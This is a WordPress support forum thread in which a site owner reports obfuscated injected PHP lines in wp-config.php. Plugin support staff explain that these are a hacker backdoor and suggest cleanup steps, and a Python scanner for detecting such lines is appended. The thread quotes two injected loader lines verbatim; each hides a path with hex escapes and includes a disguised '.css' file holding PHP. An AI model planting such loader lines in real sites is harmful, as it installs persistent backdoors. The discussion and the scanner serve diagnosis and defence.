• Resolved Beti

    (@diebeti)


    Hello 🙂

    I found the following lines in my wp-config:

    /*ff874*/ $ra1f = "/var/www/web135014/html/word\x70ress/w\x70\x2dincludes/js/cro\x70/.6aaa2d4f.css"; if (1){ @include_once /* okh */ ($ra1f); } /*ff874*/

    The css file (6aaa2d4f.css) referenced contains php code, as I have seen. Google Chrome keeps telling me that my website is dangerous. The AIOS plugin has also independently switched off the option “File and folder permissions in WordPress regulate access and read and write rights” and has changed the current permission for wp-config.php. Is it possible that the AIOS plugin creates all of this itself or is this an indication of a hacker attack?

  • Plugin Support hjogiupdraftplus

    (@hjogiupdraftplus)

    Hi @diebeti,

    No, AIOS does not add such code. Generally, wp-config.php permission should be 0640.

    But if hacker code has somehow been added through a plugin or uploaded as a PHP file, it is able to edit wp-config.php as the permissions allow (generally many plugins and the WordPress install write to wp-config.php). You can change it to 0400 once you have removed the hacked code from wp-config.php, so it will not be writable.

    It is an indication of hacker code. Please take a backup of it. Check which files have recently been added, if possible upgrade the WordPress, plugin and theme files, and cross-check that there is no such PHP file in wp-content.

    Regards

    Thread Starter Beti

    (@diebeti)

    Hello @hjogiupdraftplus, thank you for the answer 🙂 Is the following really from AIOS?

    aios-bootstrap.php

    <?php
    /**
     * @version 1.0.2
     * WARNING: Please do not delete this file.
     * This will cause PHP to throw a fatal error and render your site unusable.
     * To safely delete this file, please check both your .user.ini file and your php.ini file and ensure this file is not set in the auto_prepend_file directive.
     * Please ask your web hosting provider if you need guidance with executing the aforementioned steps.
     */
    $GLOBALS['aiowps_firewall_rules_path'] = __DIR__.'/wp-content/uploads/aios/firewall-rules/';

    $GLOBALS['aiowps_firewall_data'] = array(
        'ABSPATH' => '/var/www/web……/html/wordpress/',
    );

    Greetings 🙂

    Plugin Support hjogiupdraftplus

    (@hjogiupdraftplus)

    Hi @diebeti

    Yes, aios-bootstrap.php is from the AIOS plugin.

    Right now it defines the aiowps_firewall_rules_path and aiowps_firewall_data global variables and includes the firewall file

    all-in-one-wp-security-and-firewall/classes/firewall/wp-security-firewall.php

    If other code is inside that file, then it is malware code.

    Regards

    Thread Starter Beti

    (@diebeti)

    Hello, thank you for your answer. 🙂 Now I keep having the problem that, despite the security plugin, there are probably “malicious” files on my blog. I then delete them again and again. Somewhere in a file, after a short time, a line is always added to an existing file, such as this:

    “/*390d1*/ $rsc4no = "/var/www/web135014/htm\x6c/wordpress/wp\x2dinc\x6cudes/ b\x6cocks/media\x2dtext/.c93b5c62.css"; if (214 + 43){ @include_once /* sxwfl */ ($rsc4no); } /*390d1*/”

    – then to a newly created file, which is usually disguised as a CSS file, but contains PHP lines. In addition, the write permissions from wp-config.php are automatically implemented each time. I had set them to 400 as you suggested and today they were back to 755. But I don’t see any changes in the wp-config.php. But my database password can be seen there. Is it possible that the password can also be read by others? I also reinstalled WordPress and renewed all the plugins.

    Greetings 🙂

    Plugin Support hjogiupdraftplus

    (@hjogiupdraftplus)

    Hi @diebeti,

    AIOS has a list of features which provide a certain level of security.

    In your case, the PHP file execution code somehow got uploaded, which might be due to a plugin or FTP account hack, and it is beyond AIOS.

    You need to identify the backdoor script which keeps writing the code and changing the permission of the wp-config.php file, and also how the backdoor script was uploaded there.

    You need to get help from a developer or a malware removal service provider for WordPress.

    The DB password in wp-config.php is required so that the WordPress code files can access it for data operations.

    Regards
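
For finding every copy of the injected line discussed in this thread, here is an added example (not code from any poster or from the AIOS plugin) that decodes the `\xNN` escapes in the assigned path and reports variables that are then passed to `include`/`require`. The function names, the benign control line and the flagging heuristic (escape-obfuscated path, dotfile, or non-`.php` target) are assumptions of this example; only `\xNN` and octal escapes are decoded.

```python
import os
import re
import sys

# Shape seen in this thread: $var = "<path with \xNN escapes>"; ... @include_once /* junk */ ($var);
ASSIGN = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
INCLUDE = re.compile(r'\b(?:include|require)(?:_once)?\s*(?:/\*.*?\*/\s*)*\(?\s*\$(\w+)', re.S)
ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

# First sample is the line quoted in the first post; the second is constructed as a benign control.
SAMPLE_INJECTED = r'$ra1f = "/var/www/web135014/html/word\x70ress/w\x70\x2dincludes/js/cro\x70/.6aaa2d4f.css"; if (1){ @include_once /* okh */ ($ra1f); }'
SAMPLE_BENIGN = r'$tpl = "/var/www/example/html/wordpress/wp-includes/template.php"; include_once($tpl);'

def decode_php_escapes(s):
    """Resolve \\xNN and octal escapes as a PHP double-quoted string would."""
    def repl(m):
        return chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8) & 0xFF)
    return ESCAPE.sub(repl, s)

def find_injected_includes(php_source):
    """Return decoded paths of variables that are assigned a string and then included,
    when the string was escape-obfuscated, names a dotfile, or does not end in .php."""
    assigned = dict(ASSIGN.findall(php_source))
    hits = []
    for name in INCLUDE.findall(php_source):
        raw = assigned.get(name)
        if raw is None:
            continue
        path = decode_php_escapes(raw)
        base = os.path.basename(path)
        if raw != path or base.startswith('.') or not base.lower().endswith('.php'):
            hits.append(path)
    return hits

def scan_tree(root):
    """Yield (php_file, decoded_include_target) for every hit below root."""
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith('.php'):
                full = os.path.join(dirpath, fn)
                with open(full, encoding='utf-8', errors='replace') as fh:
                    for hit in find_injected_includes(fh.read()):
                        yield full, hit

if __name__ == '__main__':
    for php_file, target in scan_tree(sys.argv[1] if len(sys.argv) > 1 else '.'):
        print(f'{php_file}: includes {target}')
```

Each reported target is itself a file to inspect, and the modification times of the reported PHP files help narrow down when the writer script last ran.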
